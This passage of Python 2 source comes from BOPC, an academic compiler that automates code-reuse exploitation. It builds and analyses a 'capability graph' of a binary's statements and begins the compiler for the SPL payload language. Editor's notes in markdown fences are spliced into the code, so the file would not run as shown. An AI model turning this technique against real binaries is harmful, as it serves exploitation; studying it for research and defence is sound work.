        # ---------------------------------------------------------------------
        if options & CAP_LOAD:
            dbg_prnt(DBG_LVL_1, "Loading the Capability Graph from file...")

            try:
                self.__cap = nx.read_gpickle(self.__name + '.cap')

                dbg_prnt(DBG_LVL_1, "Done.")
                return                              # your job is done here

            except IOError, err:                    # if you can't load it, simply re-calculate it ;)
                error("Cannot load Capability Graph: %s" % str(err))

        # ---------------------------------------------------------------------
        # Iterate over abstracted basic blocks
        # ---------------------------------------------------------------------
        dbg_prnt(DBG_LVL_1, "Searching CFG for 'interesting' statements...")

        nnodes  = len(nx.get_node_attributes(self.__cfg.graph, 'abstr').items())
        counter = 1
        p       = P._cfg_shortest_path(self.__cfg)

        for node, abstr in nx.get_node_attributes(self.__cfg.graph, 'abstr').iteritems():
            addr = node.addr

            dbg_prnt(DBG_LVL_3, "Analyzing block at 0x%x (%d/%d)..." % (addr, counter, nnodes))

            if options & CAP_REGSET:
                for reg, data in abstr['regwr'].iteritems():
                    if data['type'] == 'concrete':
                        self.__add(addr, ty='regset', reg=reg, val=data['const'], mode='const',
                                   isW=data['writable'])
                    elif data['type'] == 'deref':
                        self.__add(addr, ty='regset', reg=reg, val=data['addr'], mode='deref')

            if options & CAP_REGMOD:
                for reg, data in abstr['regwr'].iteritems():
                    if data['type'] == 'mod':
                        self.__add(addr, ty='regmod', reg=reg, op=data['op'], val=data['const'])

            if options & CAP_MEMRD:
                for reg, data in abstr['regwr'].iteritems():
                    if data['type'] == 'deref' and data['memrd']:
                        loadreg = data['deps'][0]
                        self.__add(addr, ty='memrd', reg=reg, mem=loadreg, size=data['memrd'])

            if options & CAP_MEMWR:
                for memwr in abstr['splmemwr']:
                    self.__add(addr, ty='memwr', mem=memwr['mem'], val=memwr['val'],
                               size=memwr['size'])

            if options & CAP_CALL and abstr['call'] and find_call(abstr['call']['name']):
                self.__add(addr, ty='call', name=abstr['call']['name'], mode=abstr['call']['type'])

            # elif, because we can't have a call and a cond in the same basic block
            elif options & CAP_COND and abstr['cond']:
                self.__add(addr, ty='cond', reg=abstr['cond']['reg'], op=abstr['cond']['op'],
                           val=abstr['cond']['const'])

            '''
            # -----------------------------------------------------------------------
            # hacky way to quickly find a loop
            # -----------------------------------------------------------------------
            for length, loop in p.k_shortest_loops(addr, 0, 10):
                length, loop = p.shortest_loop(addr)

                R      = abstr['cond']['reg']
                regmod = 0
                regset = 0
                step   = 0

                if length < INFINITY:
                    for l in loop[:-1]:
                        try:
                            X = self.__cfg.graph.node[ADDR2NODE[l]]['abstr']
                        except KeyError:
                            continue

                        for reg, data in X['regwr'].iteritems():
                            if data['type'] == 'mod' and reg == R:
                                regmod += 1
                                step    = data['const']
                            elif reg == R:
                                regset += 1

                    if regmod == 1 and regset == 0:
                        emph(bolds('GOOD LOOP (%d - %d - %s) %s' % (abstr['cond']['const'],
                             step, abstr['cond']['op'], pretty_list(loop))))
                    # else:
                    #     print 'BAD LOOP (mod: %d, set: %d) (%d - %d - %s) %s' % \
                    #           (regmod, regset, abstr['cond']['const'], step,
                    #           abstr['cond']['op'], pretty_list(loop))
            '''

            counter += 1                            # update counter

        dbg_prnt(DBG_LVL_1, "Done.")

        # ---------------------------------------------------------------------
        # Show some statistics
        # ---------------------------------------------------------------------
        emph("Binary has %s interesting statements:" % bold(self.__cap.order()))

        stmt_ctr = { 'regset':0, 'regmod':0, 'memrd':0, 'memwr':0, 'call':0, 'cond':0 }

        for _, data in self.__cap.nodes(data=True):
            stmt_ctr[ data['type'] ] += 1           # count statements

        emph("\t%s register assignments"    % bold(stmt_ctr['regset'], pad=5))
        emph("\t%s register modifications"  % bold(stmt_ctr['regmod'], pad=5))
        emph("\t%s memory reads "           % bold(stmt_ctr['memrd'],  pad=5))
        emph("\t%s memory writes "          % bold(stmt_ctr['memwr'],  pad=5))
        emph("\t%s system/library calls"    % bold(stmt_ctr['call'],   pad=5))
        emph("\t%s conditional jumps"       % bold(stmt_ctr['cond'],   pad=5))

        # ---------------------------------------------------------------------
        # Add edges to the Capability Graph
        # ---------------------------------------------------------------------

        # skip edge calculation if asked to (it's time consuming)
        if options & CAP_NO_EDGE:
            dbg_prnt(DBG_LVL_1, "Skipping edge calculation of capability graph.")
            return

        dbg_prnt(DBG_LVL_1, "Building the Capability Graph...")

        # list of node addresses
        node_list = [ d['addr'] for _, d in self.__cap.nodes_iter(data=True) ]

        SPT       = nx.DiGraph()                    # create the Shortest Path Tree
        completed = 0                               # % completed
        csp       = P._cfg_shortest_path(self.__cfg)    # create the CFG Shortest Path object

        warn("This can be a very slow process ('-dd' and '-ddd' options show a progress bar)")

        # for each node u_ in the Capability Graph
        for u_, du in self.__cap.nodes_iter(data=True):
            v_ = -1                                 # v_ is the uid of the target node (u_ -> v_)

            SPT.clear()                             # clear Shortest Path Tree

            # Find the shortest paths (in the CFG) to every other statement. Unfortunately,
            # shortest paths in the CFG are not like regular shortest paths, as we explain in
            # path.py. Thus we have to re-calculate all shortest paths for every node in the
            # capability graph.
            for length, path in csp.shortest_path(du['addr'], node_list):
                v_ += 1                             # the uid of the current node (it's linear)

                if length == INFINITY: continue     # skip nodes with non-existing paths

                # ---------------------------------------------------------------------------------
                # Now, if we directly add the edges with shortest path lengths to the capability
                # graph, we'll have an interesting problem: Consider the path A - x - x - B - x - C
                # in the CFG. The Capability Graph should contain the edges (A, B, 3) and (B, C, 2).
                # However, the naive approach will also add the edge (A, C, 5) to the graph. The
                # problem here is that we cannot accurately measure chains of statements due to the
                # direct edges.
                #
                # To fix this issue we build the Shortest Path Tree (SPT). That is, we merge all
                # shortest paths into a single graph. The resulting graph will be a tree, as it
                # consists only of single-source shortest paths (without loops), with all edges
                # having weight = 1. The SPT has two types of nodes: Black and White. Black nodes
                # contain statements (they should appear in the capability graph) while White
                # nodes are used for transitions. The first and the last nodes of each shortest
                # path are Black while every node between them is White. Our goal is to remove all
                # White nodes and merge the resulting SPT with the capability graph.
                #
                # We remove the White nodes one by one. When we remove a White node, we also
                # update the weights in the SPT.
                # ---------------------------------------------------------------------------------

                # add first and last nodes (Black) to the SPT (if they already exist, make them Black)
                SPT.add_nodes_from([path[0], path[-1]], color='Black')

                # keep track of the statement uids that use this node (map address to UID)
                SPT.node[path[0] ].setdefault('uid', set()).add(u_)
                SPT.node[path[-1]].setdefault('uid', set()).add(v_)

                # convert nodes [1,2,3,4] into edges [(1,2),(2,3),(3,4)] and add them to the SPT
                SPT.add_edges_from(zip(path, path[1:]), weight=1)

                # color the intermediate nodes White (if they're not Black)
                for p in path[1:-1]:
                    if 'color' not in SPT.node[p] or SPT.node[p]['color'] != 'Black':
                        SPT.node[p]['color'] = 'White'

            # iteratively delete the White nodes
            for n in [node for node, data in SPT.nodes(data=True) if data['color'] == 'White']:
                # for each pair of (incoming, outgoing) edges
                for src, _, d1 in SPT.in_edges(n, data=True):
                    for _, dst, d2 in SPT.out_edges(n, data=True):
                        # add a new edge that bypasses the White node
                        SPT.add_edge(src, dst, weight=d1['weight'] + d2['weight'])

                SPT.remove_node(n)                  # delete White node (along with its edges)

            ''' at this point, the SPT will only contain Black nodes '''

            # merge the SPT into the capability graph
            for e1, e2, data in SPT.edges_iter(data=True):  # copy it edge-by-edge
                for u in SPT.node[e1]['uid']:       # move from addresses back to UIDs
                    for v in SPT.node[e2]['uid']:
                        if u != v:                  # that's to avoid self-loops
                            self.__cap.add_edge(u, v, weight=data['weight'])

            # show current progress (%)
            percent = math.floor(100. / len(self.__cap) * u_)

            if completed < percent:
                completed = percent
                dbg_prnt(DBG_LVL_2, "%d%% completed" % completed)

        del SPT                                     # we don't need the SPT anymore

        dbg_prnt(DBG_LVL_1, "Done. Capability Graph generated successfully.")

        visualize(self.__cap)

        # ---------------------------------------------------------------------
        # Save Capability Graph to a file?
        # ---------------------------------------------------------------------
        if options & CAP_SAVE:
            dbg_prnt(DBG_LVL_1, "Saving Capability Graph...")

            try:
                nx.write_gpickle(self.__cap, self.__name + '.cap')

                dbg_prnt(DBG_LVL_1, "Done. Capability Graph saved as %s" % (self.__name + '.cap'))
            except IOError, err:
                error("Cannot save Capability Graph: %s" % str(err))

    # ---------------------------------------------------------------------------------------------
    # get(): Return the Capability Graph. Just in case ;)
    #
    #   :Ret: The Capability Graph
    #
    def get( self ):
        return self.__cap

    # ---------------------------------------------------------------------------------------------
    # save(): Save the nodes of the Capability Graph (i.e., the interesting statements) to a file.
    #
    #   :Ret: None.
    #
    def save( self ):
        now = datetime.datetime.now()               # get current timestamp

        banner = textwrap.dedent("""\
            #
            # This file has been created by BOPC at %s
            # '%s' has %d interesting statements. Each line shows a statement.
            #
            # The columns are: address | type | register | memory | value | mode | +W | operator | name | size
            # When an attribute is not available, a dot '.' is presented.
            #
            #
            # Attribute list:
            #
            #   address  : Address of the basic block that contains the statement
            #   type     : Statement type: regset / regmod / call / cond
            #   register : Register name (for regset / regmod / cond)
            #   memory   : Memory address (for memrd / memwr)
            #   value    : Statement's value (for regset / regmod / cond)
            #   mode     : Statement mode (const / deref for regset and syscall / libcall for call)
            #   +W       : A flag indicating whether "val" points to a writable address (for regset)
            #   operator : Statement operator (for regmod / cond)
            #   name     : Function name (for call)
            #
            """ % (now.strftime("%d/%m/%Y %H:%M"), self.__name, self.__cap.order()))

        dbg_prnt(DBG_LVL_1, "Dumping interesting statements to a file...")

        try:
            cap = open(self.__name + '.stmt', 'w')
            cap.write(banner)                       # write banner first

            # write statements one by one
            for _, d in self.__cap.nodes_iter(data=True):
                opt  = '%10s'   % (d['reg']  if 'reg'  in d else '.')
                opt += '%10s'   % (d['mem']  if 'mem'  in d else '.')
                opt += ' %32s ' % (d['val']  if 'val'  in d else '.')
                opt += '%10s'   % (d['mode'] if 'mode' in d else '.')
                opt += '%10s'   % (d['+W']   if '+W'   in d else '.')
                opt += '%10s'   % (d['op']   if 'op'   in d else '.')
                opt += '%16s'   % (d['name'] if 'name' in d else '.')
                opt += '%10s'   % (d['size'] if 'size' in d else '.')

                cap.write( "0x%08x %10s %s\n" % (d['addr'], d['type'], opt) )

            cap.close()

            dbg_prnt(DBG_LVL_1, "Done. Statements saved as %s" % (self.__name + '.stmt'))
        except IOError, err:
            error("Cannot create statements file: %s" % str(err))

    # ---------------------------------------------------------------------------------------------
    # explore(): Explore the Capability Graph and look for "islands".
    #
    #   :Ret: None.
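# Editor's note: the "islands" that explore() extracts below are the connected components of the
# undirected version of the Capability Graph. A minimal, stdlib-only sketch of that idea (plain
# adjacency dicts instead of networkx; the function name `islands` is hypothetical):

```python
from collections import deque

def islands(edges):
    """Connected components ("islands") of an undirected graph given as an edge list."""
    adj = {}
    for u, v in edges:                      # build symmetric adjacency lists
        adj.setdefault(u, set()).add(v)
        adj.setdefault(v, set()).add(u)

    unvisited = set(adj)                    # initially, no node is visited
    comps = []
    while unvisited:
        root = next(iter(unvisited))        # pick any unvisited node
        comp, queue = set(), deque([root])
        while queue:                        # BFS over the whole component
            n = queue.popleft()
            if n in comp:
                continue
            comp.add(n)
            queue.extend(adj[n] - comp)
        unvisited -= comp                   # mark the component as visited
        comps.append(comp)
    return comps
```

# explore() does the same walk with nx.dfs_preorder_nodes() on self.__cap.to_undirected().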
    #
    def explore( self ):
        dbg_prnt(DBG_LVL_1, "Exploring the Capability Graph...")

        self.__islands = []                         # store islands here
        n_islands      = 0                          # number of islands
        size, diam     = [], []                     # size and diameter lists

        # ---------------------------------------------------------------------
        # The first step is to extract the "islands" from the Capability Graph,
        # which are essentially the connected components of the undirected
        # version of the graph.
        # ---------------------------------------------------------------------
        capU      = self.__cap.to_undirected()      # make Capability Graph undirected
        unvisited = set(capU.nodes())               # initially, no node is visited

        while len(unvisited):                       # while there are unvisited nodes
            root = unvisited.pop()                  # pick a random node
            unvisited.add( root )                   # and put it back (the DFS below removes it)

            nodeset = []                            # nodes in the current island

            # explore the island using DFS and obtain the node set
            for u in nx.dfs_preorder_nodes(capU, root):
                unvisited.remove(u)                 # mark u as visited
                nodeset.append(u)                   # and add it to the node set

                self.__cap.node[ u ]['island'] = n_islands

            # get island as induced (directed) subgraph and relabel nodes in [0, order(G)-1] range
            graph   = self.__cap.subgraph(nodeset)
            relabel = dict(zip(graph.nodes(), range(graph.order())))
            graph   = nx.relabel_nodes(graph, relabel)

            # ---------------------------------------------------------------------
            # Calculate the island's diameter. Although the island is connected in
            # the undirected version, it may not be in the directed version. Thus,
            # nx.diameter(graph) throws an exception. The diameter of the island
            # is the longest shortest path between any two nodes.
            # ---------------------------------------------------------------------
            D = 0                                   # island's diameter

            for n in graph.nodes_iter():
                # calculate all shortest paths from the given node
                length = nx.single_source_shortest_path_length(graph, n)
                maxlen = max(length.values())       # get the longest shortest path

                if D < maxlen: D = maxlen           # keep track of the longest among all nodes

            size.append(len(nodeset))               # island size
            diam.append( D )                        # island's diameter

            self.__islands.append( {                # store island's information
                'root'     : root,
                'size'     : graph.order(),
                'diameter' : D,
                'graph'    : graph
            } )

            n_islands += 1                          # total number of islands

        dbg_prnt(DBG_LVL_1, "Done.")

        # ---------------------------------------------------------------------
        # Show some statistics
        # ---------------------------------------------------------------------
        warn("'-dd' and '-ddd' options show the 'size' and 'diameter' lists")

        emph("Capability Graph has %s islands" % bold(n_islands))

        emph("Island sizes: max = %s, min = %s, avg = %s" %
             (bold(max(size)), bold(min(size)), bold(1.*sum(size)/n_islands, 'float')))

        dbg_arb(DBG_LVL_2, "Island size list", size)

        emph("Island diameters: max = %s, min = %s, avg = %s" %
             (bold(max(diam)), bold(min(diam)), bold(1.*sum(diam)/n_islands, 'float')))

        dbg_arb(DBG_LVL_2, "Island diameter list", diam)

    # ---------------------------------------------------------------------------------------------
    # analyze(): Perform various analyses on the islands of the Capability Graph.
    #
    #   :Arg analyses: The analyses to perform (can be many)
    #   :Ret: None.
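# Editor's note: the per-island diameter above is the longest shortest path over all ordered
# reachable pairs, computed by a BFS from every node. A stdlib sketch of the same computation
# (hypothetical helper `digraph_diameter`; unweighted edges, adjacency given as a dict):

```python
from collections import deque

def digraph_diameter(adj):
    """Longest shortest path (in edges) over all reachable ordered pairs of a digraph."""
    best = 0
    for src in adj:                         # BFS from every node, mirroring
        dist = {src: 0}                     # nx.single_source_shortest_path_length()
        queue = deque([src])
        while queue:
            n = queue.popleft()
            for m in adj[n]:
                if m not in dist:
                    dist[m] = dist[n] + 1
                    queue.append(m)
        best = max(best, max(dist.values()))    # longest shortest path from src
    return best
```

# Unreachable pairs are simply skipped, which is why nx.diameter() (which requires strong
# connectivity) cannot be used directly on the island.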
    #
    def analyze( self, *analyses ):
        dbg_prnt(DBG_LVL_1, "Analyzing the Capability Graph...")

        for analysis in analyses:               # for every different analysis
            try:
                # based on the analysis, select the appropriate function and invoke it
                func = {
                    CAP_STMT_COMB_CTR : self.__analyze_stmt_comb_ctr,
                    CAP_STMT_MIN_DIST : self.__analyze_stmt_min_dist,
                    CAP_LOOPS         : self.__analyze_loops
                }[ analysis ]

                for island in self.__islands:   # perform the analysis on every island
                    func( island['graph'] )

            except KeyError, err:
                fatal('Unknown analysis %s' % str(err))

    # ---------------------------------------------------------------------------------------------
    # analyze_island(): Analyze a specific island.
    #
    #   :Arg addr:     An address of any node of the island
    #   :Arg analyses: The analyses to perform (can be many)
    #   :Ret: None.
    #
    def analyze_island( self, addr, *analyses ):
        # ---------------------------------------------------------------------
        # Search for the island to analyze
        # ---------------------------------------------------------------------
        island_id = -1

        for _, d in self.__cap.nodes_iter(data=True):
            if d['addr'] == addr:
                island_id = d['island']
                break

        if island_id < 0:
            fatal("Node '0x%x' is not contained in any island" % addr)

        dbg_prnt(DBG_LVL_1, "Analyzing Island %d..." % island_id)

        # ---------------------------------------------------------------------
        # Perform the analyses
        # ---------------------------------------------------------------------
        for analysis in analyses:               # for every different analysis
            try:
                # based on the analysis, select the appropriate function and invoke it
                func = {
                    CAP_STMT_COMB_CTR : self.__analyze_stmt_comb_ctr,
                    CAP_STMT_MIN_DIST : self.__analyze_stmt_min_dist,
                    CAP_LOOPS         : self.__analyze_loops
                }[ analysis ]

                func( self.__islands[ island_id ]['graph'] )

            except KeyError, err:
                fatal('Unknown analysis %s' % str(err))

    # ---------------------------------------------------------------------------------------------
    # callback(): Invoke a callback function for every island.
    #
    #   :Arg cbfunc: The callback function to invoke
    #   :Ret: None.
    #
    def callback( self, cbfunc ):
        for island in self.__islands:
            cbfunc( island['graph'] )

    # TODO: Move these to the private functions section

    # ---------------------------------------------------------------------------------------------
    # __analyze_stmt_comb_ctr(): Count the total number of ways that K SPL statements can be
    #       chained together (repetitions of statements are allowed) on a given island.
    #
    #   :Arg island: The island graph to work on
    #   :Ret: None.
    #
    def __analyze_stmt_comb_ctr( self, island ):
        dbg_prnt(DBG_LVL_1, "Starting Analysis: Statement Combinations...")

        # TODO: Check this again. Too many combinations :\
        K = 20

        # ---------------------------------------------------------------------
        # Find the total number of paths between any 2 nodes that use exactly
        # K edges. We calculate that using Dynamic Programming. Let C^k_{ij} be
        # the total number of paths from i to j with exactly k edges. Then we
        # have:
        #
        #   C^0_{ii} = 1, for all i in V
        #   C^1_{ij} = 1, iff (i,j) in E
        #   C^k_{ij} = SUM(C^{k-1}_{xj}), over all x adjacent to i
        #
        # We build this table in a bottom-up fashion. Time/Space complexity is
        # O(|V|^2 * K). We can improve the space complexity by storing only
        # the last two levels (k and k-1).
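# Editor's note: the recurrence above can be sanity-checked on a toy graph with plain Python
# (no numpy); a minimal sketch, with the hypothetical name `count_walks` since the recurrence
# actually counts walks (node repetitions are allowed):

```python
def count_walks(n, edges, K):
    """C[k][i][j] = number of walks from i to j using exactly k edges.

    n is the node count (nodes are 0..n-1), edges a set of (i, j) pairs.
    """
    C = [[[0] * n for _ in range(n)] for _ in range(K)]
    for i in range(n):                      # base case k = 0: the empty walk
        C[0][i][i] = 1
    for i, j in edges:                      # base case k = 1: one walk per edge
        C[1][i][j] = 1
    for k in range(2, K):                   # C^k_{ij} = sum of C^{k-1}_{xj} over successors x of i
        for i in range(n):
            for j in range(n):
                C[k][i][j] = sum(C[k-1][x][j] for x in range(n) if (i, x) in edges)
    return C
```

# On a 2-cycle {(0,1), (1,0)} there is exactly one walk of each length from node 0, ending at
# node 0 for even lengths and at node 1 for odd ones.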
        # ---------------------------------------------------------------------
        C = numpy.zeros((K, island.order(), island.order()), dtype=numpy.int64)

        for i in range(island.order()):             # initialize for K = 0
            C[0][i][i] = 1

        for i, j, d in island.edges_iter(data=True):    # initialize for K = 1
            C[1][i][j] = 1

        for k in range(2, K):                       # main loop
            for i in island.nodes():
                for j in island.nodes():
                    for x in island.neighbors(i):
                        C[k][i][j] += C[k-1][x][j]

        # ---------------------------------------------------------------------
        for k in range(K):
            dbg_arb(DBG_LVL_1, "Combinations with exactly %d statements:" % k,
                    sum(sum(C[k][:][:])))

    # ---------------------------------------------------------------------------------------------
    # __analyze_stmt_min_dist(): Calculate the minimum distance between any two statements that
    #       are exactly K edges apart on a given island.
    #
    #   :Arg island: The island graph to work on
    #   :Ret: None.
    #
    def __analyze_stmt_min_dist( self, island ):
        '''
        B = { }

        # enumerate all simple paths from i to j
        # WARNING: O(n!) complexity !!!
        for i in island.nodes_iter():
            for j in island.nodes_iter():
                if i == j: continue

                for x in nx.all_simple_paths(island, i, j):
                    A = [island[a][b]['weight'] for a, b in zip(x, x[1:])]
                    B.setdefault(len(x), []).append(sum(A))
        '''
        dbg_prnt(DBG_LVL_1, "Starting Analysis: Statement Minimum Distances...")

        K = 20

        # ---------------------------------------------------------------------
        # Find the minimum distance between any 2 nodes that use exactly K edges.
        # This is very similar to the algorithm in __analyze_stmt_comb_ctr(),
        # but with different Dynamic Programming equations:
        #
        #   M^0_{ii} = 0, for all i in V
        #   M^1_{ij} = weight[i][j], iff (i,j) in E
        #   M^k_{ij} = MIN(M^k_{ij}, weight[i][x] + M^{k-1}_{xj}),
        #              over all x adjacent to i
        # ---------------------------------------------------------------------
        M = numpy.full((K, island.order(), island.order()), dtype=numpy.int32,
                       fill_value=INFINITY)

        for i in range(island.order()):             # initialize for K = 0
            M[0][i][i] = 0

        for i, j, d in island.edges_iter(data=True):    # initialize for K = 1
            M[1][i][j] = d['weight']

        for k in range(2, K):                       # main loop
            for i in island.nodes():
                for j in island.nodes():
                    for x in island.neighbors(i):
                        M[k][i][j] = min(M[k][i][j], island[i][x]['weight'] + M[k-1][x][j])

        # ---------------------------------------------------------------------
        for k in range(K):
            m = numpy.min(M[k][:][:])
            if m == INFINITY: break

            dbg_prnt(DBG_LVL_1, "Min shortest path with exactly %d statements: %d" % (k, m))

    # ---------------------------------------------------------------------------------------------
    # __analyze_loops(): Analyze the loops on a given island.
    #
    #   :Arg island: The island graph to work on
    #   :Ret: None.
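# Editor's note: the min-distance recurrence can likewise be checked without numpy; a minimal
# sketch, assuming a weighted edge list and using `INF` in place of INFINITY (the function name
# `min_dist_exact_k` is hypothetical):

```python
INF = float('inf')

def min_dist_exact_k(n, wedges, K):
    """M[k][i][j] = minimum total weight of a walk from i to j using exactly k edges.

    n is the node count (nodes are 0..n-1), wedges a list of (i, j, weight) triples.
    """
    w = {(i, j): wt for i, j, wt in wedges}     # edge-weight lookup
    M = [[[INF] * n for _ in range(n)] for _ in range(K)]
    for i in range(n):                          # base case k = 0
        M[0][i][i] = 0
    for (i, j), wt in w.items():                # base case k = 1
        M[1][i][j] = wt
    for k in range(2, K):                       # relax over the first hop i -> x
        for i in range(n):
            for j in range(n):
                M[k][i][j] = min([w[(i, x)] + M[k-1][x][j]
                                  for x in range(n) if (i, x) in w] or [INF])
    return M
```

# On a weighted 3-cycle the only length-2 and length-3 walks are forced, so the table entries
# are simply the corresponding weight sums.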
    #
    def __analyze_loops( self, island ):
        warn('Loop analysis is not supported yet')

# -------------------------------------------------------------------------------------------------


================================================
FILE: source/compile.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,       _,gggggg,_      ,ggggggggggg,        ,gggg,
#   dP"""88""""""Y8,   ,d8P""d8P"Y8b,   dP"""88""""""Y8,    ,88"""Y8b,
#   Yb,  88      `8b,d8'    Y8   "8b,dPYb,  88      `8b    d8"     `Y8
#    `"  88      ,8Pd8'     `Ybaaad88P' `"  88      ,8Pd8' 8b       d8
#        88aaaad8P" 8P        `""""Y8       88aaaad8P",8I  "Y88P'
#        88""""Y8ba 8b              d8      88"""""   I8'
#        88      `8bY8,            ,8P      88        d8
#        88      ,8P`Y8,          ,8P'      88        Y8,
#        88_____,d8'  `Y8b,,__,,d8P'        88        `Yba,,_____,
#       88888888P"      `"Y8888P"'          88          `"Y8888888
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
#   Kyriakos Ispoglou (ispo) - ispo@purdue.edu
#   PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# compile.py:
#
# This module compiles a program written in SPL into an equivalent Intermediate Representation
# (IR) suitable for processing by subsequent modules. Please do not confuse it with the VEX IR.
#
# SPL is actually a subset of C, so it has the same syntax. Comments are denoted with '//'.
# Multi-line comments are not supported. The specs of the language (expressed in EBNF) are shown
# below:
#
#   <program> := 'void' 'payload' '(' ')' '{' <stmts> '}'
#   <stmts>   := ( <stmt> |